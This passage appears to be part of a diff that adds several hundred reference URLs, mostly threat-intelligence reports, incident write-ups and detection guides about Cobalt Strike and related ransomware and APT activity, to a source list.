"https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis", + "https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/", + "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021", + "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", + "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf", + "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/", + "https://labs.k7computing.com/index.php/cobalt-strikes-deployment-with-hardware-breakpoint-for-amsi-bypass/", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", + "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a", + "https://cert.gov.ua/article/619229", + "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/", + "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/", + "https://www.mandiant.com/media/12596/download", + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/", + "https://www.youtube.com/watch?v=ysN-MqyIN7M", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign", + "https://www.malware-traffic-analysis.net/2021/09/17/index.html", + "https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/", + "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine", + "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html", "https://www.secureworks.com/research/threat-profiles/bronze-president", - "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e" + "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf", + "https://assets.virustotal.com/reports/2021trends.pdf", + "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", + "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", + "https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/", + "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/", + "https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", + "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", + "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", + "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/", + "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations", + "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure", + "https://community.riskiq.com/article/0bcefe76", + "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf", + "https://www.youtube.com/watch?v=gfYswA_Ronw", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor", + "https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/", + "http://blog.nsfocus.net/murenshark", + "https://twitter.com/AltShiftPrtScn/status/1350755169965924352", + "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://redcanary.com/blog/gootloader", + "https://www.macnica.net/file/mpression_automobile.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://intel471.com/blog/shipping-companies-ransomware-credentials", + "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", + "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections", + "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks", + "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://blog.macnica.net/blog/2020/11/dtrack.html", + "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/", + "http://stillu.cc/assets/slides/2023-08-Unmasking%20CamoFei.pdf", + "https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/", + "https://malwarebookreports.com/cryptone-cobalt-strike/", + "https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/", + "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf", + "https://isc.sans.edu/diary/rss/27618", + "https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2", + "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", + "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", + "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9", + "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/", + "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos", + "https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/", + "https://www.mandiant.com/resources/spear-phish-ukrainian-entities", + "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/", + "https://asec.ahnlab.com/en/34549/", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", + "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks", + "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", + "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/", + "https://www.youtube.com/watch?v=WW0_TgWT2gs", + "https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/", + "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", + "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/", + "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors", + "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", + "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive", + "https://isc.sans.edu/diary/27308", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", + "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://mez0.cc/posts/cobaltstrike-powershell-exec/", + "https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/", + "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1", + "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/", + "https://www.cobaltstrike.com/support", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", + "https://isc.sans.edu/diary/26752", + "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html", + "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", + "https://www.mandiant.com/resources/russian-targeting-gov-business", + "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/", + "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html", + "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/", + "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", + "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", + "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery", + "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64", + "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/", + "https://asec.ahnlab.com/en/31811/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", + "https://www.ic3.gov/Media/News/2021/210823.pdf", + "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671", + "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/", + "https://twitter.com/elisalem9/status/1398566939656601606", + "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel", + "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e", + "http://www.secureworks.com/research/threat-profiles/gold-drake", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + "https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors", + "https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/", + "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", + "https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/", + "https://blog.nviso.eu/2021/11/03/cobalt-strike-using-process-memory-to-decrypt-traffic-part-3/", + "https://www.brighttalk.com/webcast/7451/462719", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/", + "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", + "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", + "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", + "https://www.telsy.com/download/5972/?uid=d7c082ba55", + "https://blog.group-ib.com/apt41-world-tour-2021", + "https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/", + "https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/sophos-cybersecurity/solarwinds-threathunt", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", + "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5", + "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/", + "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", + "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/", + "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine", + "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/", + "https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services", + "https://www.secureworks.com/research/threat-profiles/gold-waterfall", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services", + "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/", + "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718", + "https://github.com/chronicle/GCTI", + "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/", + "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware", + "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis", + "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/", + "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://cert.gov.ua/article/37704", + "https://connormcgarr.github.io/thread-hijacking/", + "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/", + "https://cyber.wtf/2022/03/23/what-the-packer/", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html", + "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", + "https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/", + "https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf", + "https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI", + "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", + "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems", + "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html", + "https://github.com/dodo-sec/Malware-Analysis/blob/main/Cobalt%20Strike/Indirect%20Syscalls.md", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", + "https://community.riskiq.com/article/f0320980", + "https://www.secureworks.com/research/threat-profiles/gold-niagara", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021", + "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/", + "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41", + "https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf", + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://paper.seebug.org/1301/", + "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf", + "https://twitter.com/Cryptolaemus1/status/1407135648528711680", + "https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/", + "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/", + "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", + "https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/", + "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists", + "https://experience.mandiant.com/trending-evil-2/p/1", + "https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation", + "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/", + "https://security.macnica.co.jp/blog/2022/05/iso.html", + "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/", + "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf", + "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/", + "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise", + "https://www.mandiant.com/resources/sabbath-ransomware-affiliate", + "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns", + "https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b", + "https://us-cert.cisa.gov/ncas/alerts/aa21-265a", + "https://twitter.com/VK_Intel/status/1294320579311435776", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://malwarelab.eu/posts/fin6-cobalt-strike/", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://401trg.com/burning-umbrella/ ", + "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", + "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/", + "https://asec.ahnlab.com/ko/19860/", + "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", + "https://twitter.com/TheDFIRReport/status/1356729371931860992", + "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", + "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf", + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan", + "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf", + "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/", + "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/", + "https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.youtube.com/watch?v=pIXl79IPkLI", + "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", + "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/", + "https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware", + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", + "https://www.youtube.com/watch?v=borfuQGrB8g", + "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://www.arashparsa.com/catching-a-malware-with-no-name/", + "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20", + "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/", + "https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/", + "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/", + "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/", + "https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64", + "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/", + "https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/", + "https://community.riskiq.com/article/c88cf7e6", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://twitter.com/MsftSecIntel/status/1522690116979855360", + "https://twitter.com/Unit42_Intel/status/1461004489234829320", + "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", + "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/", + "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/", + "https://wbglil.gitbook.io/cobalt-strike/", + "https://www.contextis.com/en/blog/dll-search-order-hijacking", + "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/", + "https://isc.sans.edu/diary/rss/26862", + "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack", + "https://isc.sans.edu/diary/28636", + "https://isc.sans.edu/diary/rss/28752", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/", + "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/", + "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/", + "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730", + "https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/", + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility", + "https://www.varonis.com/blog/hive-ransomware-analysis", + "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + 